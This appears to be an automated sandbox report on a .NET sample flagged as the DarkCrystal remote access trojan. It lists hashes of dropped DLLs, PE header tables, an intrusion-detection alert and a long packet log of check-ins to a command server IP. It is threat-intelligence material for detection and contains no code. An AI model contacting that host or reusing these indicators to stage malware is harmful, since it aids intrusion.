                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38400
                                                Entropy (8bit):5.699005826018714
                                                Encrypted:false
                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                MD5:87765D141228784AE91334BAE25AD743
                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):46592
                                                Entropy (8bit):5.870612048031897
                                                Encrypted:false
                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.629584586954759
                                                Encrypted:false
                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):50176
                                                Entropy (8bit):5.723168999026349
                                                Encrypted:false
                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.629584586954759
                                                Encrypted:false
                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69632
                                                Entropy (8bit):5.932541123129161
                                                Encrypted:false
                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):5.535426842040921
                                                Encrypted:false
                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):39936
                                                Entropy (8bit):5.660491370279985
                                                Encrypted:false
                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                MD5:240E98D38E0B679F055470167D247022
                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.909536568846014
                                                Encrypted:false
                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (362), with no line terminators
                                                Category:dropped
                                                Size (bytes):362
                                                Entropy (8bit):5.837538806616573
                                                Encrypted:false
                                                SSDEEP:6:bOjBZbtSMLp3rxeKh2/+d03KdZ0Xapmu2CJtzMbQUvW5b/JbCGtRQPN3:Qnt/pIx2d03KdZ0qY6jzMbBOLb7QPl
                                                MD5:77E164E3D368E28C191094BED4E258FD
                                                SHA1:A69F4A93D4D44146619EF609BD3244F573CA5B9E
                                                SHA-256:0A1939160A04650530D29087A43B438F011EBBFA686E7B13746FB9FD9616DFEA
                                                SHA-512:2955EA5D0861EF9F0785D38A7EA7E1BCA76781B2CDD15402F86F904F7DD8F89A14B8C95B576BEE7A21B94B33D26274CD79B8F8F13CCD3CC5E1BAE9A563BC53A6
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Windows\System32\PING.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):502
                                                Entropy (8bit):4.630609828667227
                                                Encrypted:false
                                                SSDEEP:12:PF5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:3dUOAokItULVDv
                                                MD5:AD895E21D0D519A86FAF4781C06E40AD
                                                SHA1:E1117E8118B19001664288AB0C32E32CD0FB6C6D
                                                SHA-256:24B06C18C14E5F86DAB472772B3903A77CBE9549B3F4C4AAED1E86B509A1D44B
                                                SHA-512:617AE584FB3CA7D1BD5035C80B003F4A3BD2520CA12A1A3031F136D17DE418ECEC754BCC054B23EC19CABACEE6D8B5EEA79244B724C6BCE7F14C646FB2088548
                                                Malicious:false
                                                Preview:..Pinging 468325 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):4.648835098499072
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                File name:A5EbyKyjhV.exe
                                                File size:2'551'808 bytes
                                                MD5:48b90c11912e9c7147d86c55d1e2cc94
                                                SHA1:ffc71fb727607913aa176c85f75972f1ac6fda7c
                                                SHA256:bb0f507a87420a0597cdc40917ea1ba9c9576d3e750db3f9b66802b19550c9e7
                                                SHA512:175b7358de82827ca29ecef204fa2451ba44e3e3fc373f65bc40d2d888d43a5d0bc778a78f714e47369b8d9a5b37faa4106e912bb53b13791714d1c7773431f8
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                TLSH:14C57D343DEB502AB173EFB58AE4789ADA6FF6B33707585E205103864713A81DDC163A
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x67078e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x270734 | 0x57 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x272000 | 0x370 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x274000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x26e794 | 0x26e800 | c514593763f9a6c6239b743976e92074 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x272000 | 0x370 | 0x400 | acbaaf3fe5719356ba5e37a0f370d73a | False | 0.376953125 | data | 2.86382809101071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x274000 | 0xc | 0x200 | 9f10a8dcd24c6ed02c6d3a629d2f236f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x272058 | 0x318 | data | | | 0.44823232323232326 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-05T16:02:21.596399+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49724 | 121.127.37.30 | 80 | TCP |
                                                Dec 5, 2024 16:02:44.101488113 CET4977980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.112104893 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.187077045 CET4979280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.187187910 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.187402010 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.307208061 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.307277918 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.307488918 CET8049792121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.307497978 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.307538033 CET4979280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.308459044 CET8049793121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.308510065 CET4979380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.427931070 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.659055948 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:44.779336929 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.779366970 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:44.779376984 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:45.634993076 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:45.674588919 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:45.860934019 CET8049799121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:45.908962965 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:45.984049082 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:46.104065895 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:46.104146957 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:46.104312897 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:46.224148035 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:46.456175089 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:46.575982094 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:46.576023102 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:46.576073885 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:47.428924084 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:47.471457958 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.668637037 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:47.721637964 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.797879934 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.798038006 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.918255091 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:47.918365955 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.918567896 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:47.922175884 CET8049804121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:47.922287941 CET4980480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:48.038229942 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:48.268506050 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:48.388995886 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:48.389029980 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:48.389137030 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:48.941028118 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:48.941920042 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.060969114 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.061119080 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.062199116 CET8049806121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.062246084 CET4980680192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.062359095 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.067878962 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.068370104 CET4979980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.182771921 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.187783957 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.191144943 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.191667080 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.311728954 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.411442995 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.531476021 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.531498909 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.549988031 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:49.670438051 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.670464039 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:49.670618057 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.387979031 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.440352917 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.520759106 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.565263987 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.621937990 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.674724102 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.754431963 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.799601078 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.874994993 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.875193119 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.875422955 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.996488094 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.997814894 CET8049812121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.997827053 CET8049813121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:50.998069048 CET4981380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.998070955 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.998073101 CET4981280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:50.998230934 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:51.117938042 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:51.346616030 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:51.466767073 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:51.467127085 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:51.467353106 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:52.318789959 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:52.362112045 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.552360058 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:52.596524954 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.680362940 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.680666924 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.850240946 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:52.850255013 CET8049819121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:52.850451946 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.850456953 CET4981980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.850572109 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:52.970546961 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:53.205964088 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:53.326015949 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:53.326047897 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:53.326196909 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:54.170059919 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:54.221508026 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:54.404630899 CET8049824121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:54.455876112 CET4982480192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:54.532588959 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:54.652452946 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:54.652556896 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:54.652755976 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:54.772599936 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.002866983 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.123363972 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.123387098 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.123424053 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.628516912 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.628668070 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.748375893 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.749155998 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.749274969 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.750509977 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.758840084 CET8049829121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.759125948 CET4982980192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.869438887 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.870729923 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:55.873142958 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.873297930 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:55.993087053 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:56.096652985 CET4983280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:56.216479063 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:56.216645002 CET8049832121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:56.221597910 CET4983380192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:02:56.341738939 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:56.341799974 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:56.342761993 CET8049833121.127.37.30192.168.2.7
                                                Dec 5, 2024 16:02:57.087403059 CET8049832121.127.37.30192.168.2.7
